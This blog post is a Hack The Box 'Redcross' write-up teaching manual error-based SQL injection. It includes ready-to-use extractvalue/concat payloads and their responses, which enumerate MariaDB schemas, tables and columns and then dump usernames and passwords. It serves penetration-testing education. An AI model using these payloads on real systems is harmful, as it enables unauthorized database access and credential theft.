Manual Error Based SQL Injection

Credit to the wonderful box “Redcross” in HTB that exposed me with this form of attack, so let’s start. Now we can always use automated tools like sqlmap but that’s not ideal in every environment because of brute force checks on the target and more over, manual kinda gives a better idea and a better learning opportunity.

Now you are in a web page and have managed to crash the backend SQL query. The error displayed on the page looks like this
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1

Let’s try to extract the DB version. We can terminate the query and then use extract value to achieve that like this. We send the initial request to burp suite and then tweak the request like this.

We sent: o=1')+and+extractvalue(0x0a,version())--+-
We got the response: DEBUG INFO: XPATH syntax error: '.26-MariaDB-0+deb9u1' There you go, we have the database version now, but the response appears to be truncated, let’s try something different.

Let’s wrap the version with concat like this: o=1')+and+extractvalue(0x0a,concat(0x0a,version()))--+-
The response now looks much better: DEBUG INFO: XPATH syntax error:'10.1.26-MariaDB-0+deb9u1'
Burp Suite Screenshot below

Great! Let’s dig deeper now. Presenting INFORMATION_SCHEMA. Read more at https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
We will first use the schema_name column in the schemata table to look at the databases. We use LIMIT <n>,1 to scroll through and see how many databases we have. In this example LIMIT 0,1 gives information_schema database and 1,1 reveals the redcross data base.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+SCHEMA_NAME+from+INFORMATION_SCHEMA.SCHEMATA+LIMIT+1,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: '
redcross'

Now let’s look at the tables in redcross database. We use the TABLES table to look at all the tables using the same logic to switch our LIMIT #. Example we were able to discover a users table using the following.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+where+TABLE_SCHEMA+like+'redcross'+LIMIT+2,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'users'

Awesome! Now lets look at the users table. We follow the same logic and do this now.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME+like+'users'+LIMIT+0,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'id'
In our example:

LIMIT 1,1 gives username
LIMIT 2,1 gives password
LIMIT 3,1 gives email
LIMIT 4,1 gives role
Now well, you guessed it! we want to see the actual data, actual password!

Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+username+from+redcross.users+LIMIT+0,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'admin'
Increment LIMIT params to go through all the users and then look at password column and perform the same steps. You now have the user:pwd combinations. Happy pen-testing!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s